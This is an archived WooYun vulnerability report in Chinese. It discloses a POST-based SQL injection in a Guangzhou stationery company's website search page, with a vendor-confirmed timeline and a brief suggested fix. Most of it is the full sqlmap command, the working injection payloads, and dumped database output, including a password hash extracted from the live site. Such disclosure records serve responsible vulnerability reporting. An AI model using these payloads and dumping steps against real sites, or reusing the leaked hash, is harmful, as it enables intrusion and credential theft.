乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-04: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
广州市雅阅文化用品有限公司主站存在POST型SQL注射漏洞(用户密码+6000多用户日志)
地址:http://**.**.**.**/allSearch.php
$ python sqlmap.py -u "http://**.**.**.**/allSearch.php" -p allwordsearch --technique=BE --output-dir=output --form --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass
Database: oa7day_com+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| cms_userlog | 6154 |
Database: oa7day_comTable: cms_user[1 entry]+----------------------------------+| password |+----------------------------------+| c9317db76d2c2637f0e43cfd0036de4c |+----------------------------------+Database: oa7day_comTable: cms_session[1 entry]+----------------------------------+| Password |+----------------------------------+| c9317db76d2c2637f0e43cfd0036de4c |+----------------------------------+
---Parameter: allwordsearch (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: allwordsearch=OlwO'||(SELECT 'XkTh' FROM DUAL WHERE 1859=1859 RLIKE (SELECT (CASE WHEN (3831=3831) THEN 0x4f6c774f ELSE 0x28 END)))||' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: allwordsearch=OlwO'||(SELECT 'sbTl' FROM DUAL WHERE 3497=3497 AND (SELECT 6997 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(6997=6997,1))),0x7170706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'---web application technology: Apacheback-end DBMS: MySQL 5.0current user: 'oa7day_com@%'current user is DBA: Falsedatabase management system users [1]:[*] 'oa7day_com'@'%'Database: oa7day_com+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| cms_userlog | 6154 || cms_product | 5650 || cms_ordertext | 1938 || cms_admintopic | 1115 || cms_topic | 239 || cms_orderlist | 114 || cms_channel | 20 || cms_orderfield | 17 || cms_ad_setting | 12 || cms_functions | 11 || cms_home_topic | 8 || cms_message | 5 || cms_homelogo | 3 || cms_publichtml | 3 || cms_setting | 3 || cms_website | 3 || cms_news | 1 || cms_session | 1 || cms_user | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 731 || COLLATION_CHARACTER_SET_APPLICABILITY | 126 || COLLATIONS | 126 || TABLES | 60 || STATISTICS | 51 || KEY_COLUMN_USAGE | 39 || TABLE_CONSTRAINTS | 39 || CHARACTER_SETS | 36 || SCHEMA_PRIVILEGES | 16 || SCHEMATA | 2 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: oa7day_comTable: cms_mem_user[1 column]+----------+-------------+| Column | Type |+----------+-------------+| userpass | varchar(50) |+----------+-------------+Database: oa7day_comTable: cms_user[1 column]+----------+-------------+| Column | Type |+----------+-------------+| password | varchar(40) |+----------+-------------+Database: oa7day_comTable: cms_session[1 column]+----------+-------------+| Column | Type |+----------+-------------+| Password | varchar(40) |+----------+-------------+Database: oa7day_comTable: cms_mem_user[0 entries]+----------+| userpass |+----------++----------+Database: oa7day_comTable: cms_user[1 entry]+----------------------------------+| password |+----------------------------------+| c9317db76d2c2637f0e43cfd0036de4c |+----------------------------------+Database: oa7day_comTable: cms_session[1 entry]+----------------------------------+| Password |+----------------------------------+| c9317db76d2c2637f0e43cfd0036de4c |+----------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: allwordsearch (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: allwordsearch=OlwO'||(SELECT 'XkTh' FROM DUAL WHERE 1859=1859 RLIKE (SELECT (CASE WHEN (3831=3831) THEN 0x4f6c774f ELSE 0x28 END)))||' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: allwordsearch=OlwO'||(SELECT 'sbTl' FROM DUAL WHERE 3497=3497 AND (SELECT 6997 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(6997=6997,1))),0x7170706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'---web application technology: Apacheback-end DBMS: MySQL 5.0Database: oa7day_comTable: cms_userlog[4 columns]+--------------+----------------------+| Column | Type |+--------------+----------------------+| actionString | varchar(200) || doTime | datetime || hostID | smallint(3) || userID | smallint(5) unsigned |+--------------+----------------------+
上WAF。
危害等级:高
漏洞Rank:10
确认时间:2015-12-08 14:45
非常感谢您的报告。报告中的问题已确认并复现.影响的数据:高攻击成本:低造成影响:高综合评级为:高,rank:10正在联系相关网站管理单位处置。
暂无